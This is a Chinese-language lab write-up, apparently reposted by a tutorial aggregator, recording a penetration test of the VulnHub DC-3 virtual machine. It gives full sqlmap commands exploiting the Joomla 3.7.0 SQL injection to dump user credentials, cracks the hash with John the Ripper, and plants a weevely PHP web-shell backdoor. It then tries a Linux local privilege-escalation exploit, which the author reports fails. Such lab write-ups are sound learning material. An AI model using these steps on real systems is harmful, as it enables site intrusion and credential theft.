大佬教程收集整理的这篇文章主要介绍了vulnhub-DC:3靶机渗透记录,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/
导入到vmware
导入的时候遇到一个问题
解决方法:
点 “虚拟机”->“设置”->选择 “磁盘/光驱IDE设备" ->点 ”高级“,
将要 启动设备 设置到 IDE 0:0 上就可以了
打开kali准备进行渗透(ip:192.168.200.6)
利用nmap进行ip端口探测
nmap -sS 192.168.200.6/24
探测到ip为192.168.200.14的靶机,开放了80端口,这里吸取到dc2的教训,再用nmap对所有端口进行探测
nmap -sV -p- 192.168.200.14
已经没有别的端口开放了,那就进入网站看看
首页给到的信息是只有一个flag和一个入口,让我们直接获取root权限,简单粗暴
网站用的是Joomla框架,可以使用joomscan工具获取其框架的详细版本信息
再用dirsearch对目录进行扫描看看有没有别的有用信息
dirsearch -u http://192.168.200.14:80
除了个后台登陆页面好像没有别的有用的信息了http://192.168.200.14/administrator/index.php
使用joomscan进行扫描,在kali直接下载
apt install joomscan
joomscan -u 192.168.200.14
看到版本是joomla3.7.0
百度到joomla存在sql注入漏洞CVE-2017-8917
但在msf不能直接利用这个漏洞
只能在searchploit中查找关于这个漏洞的利用方法
searchsploit joomla 3.7
可以打开txt文件查看具体的利用方法说明(绝对路径为/usr/share/exploitdb/exploits/php/webapps/42033.txt)
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
直接告诉我们使用sqlmap,payload都写好给你了
使用sqlmap用刚刚得到的payload直接跑
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
得到5个数据库,接下来查看joomladb数据库中的表
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
拿到表名#__users,接下来查看列名
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --@R_944_8620@ns -p list[fullordering]
拿到列名后就可以看数据了
sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]
得到加密的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
去md5在线解密网站也解不出,但应该也是某种hash加密,只能祭出强大的John the Ripper(密码破解工具)
保存一下密码,直接用john爆破
得到密码snoopy
去之前扫到的后台登陆界面登陆后台
在后台管理页面中找到了文件上传的地方,准备测试一下有没有文件上传的漏洞
使用weevely(linux中的蚁剑)工具生成后门木马
weevely generate test test.php
这样就生成了后门木马
但这里的文件上传的地方好像不行,只能在里面创建一个文件,然后将代码复制进去
然后用weevely连接sHell(这里的url是test.php的路径)
连接成功,现在已经拿到一个websHell,但只有www-data权限,开始提权
查看内核版本
uname -a
使用linux 4.4.0-21-generic #37-Ubuntu,在网上查找是ubuntu16.04
在searchploit寻找关于ubuntu16.04的权限提升的漏洞
searchsploit ubuntu 16.04 linux
打开文件查看漏洞具体利用方法
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
下载exp到dc3的本地
解压 unzip 39772.zip,再解压tar -xvf exploit.tar
接下来就执行刚刚漏洞利用文件演示的代码
./compile.sh
./doubleput
但是我不知道什么情况执行了之后报错,看了看别人的也有一位和我一样卡住不知道什么原因
就差最后一步就可以拿到flag了。。。以后有时间在看看是怎么回事
靶机实战-DC-3_滕财然的博客-CSDN博客
Vulnhub之路Ⅵ——DC-3(最后一步卡住) - 知乎 (zhihu.com)
以上是大佬教程为你收集整理的vulnhub-DC:3靶机渗透记录全部内容,希望文章能够帮你解决vulnhub-DC:3靶机渗透记录所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。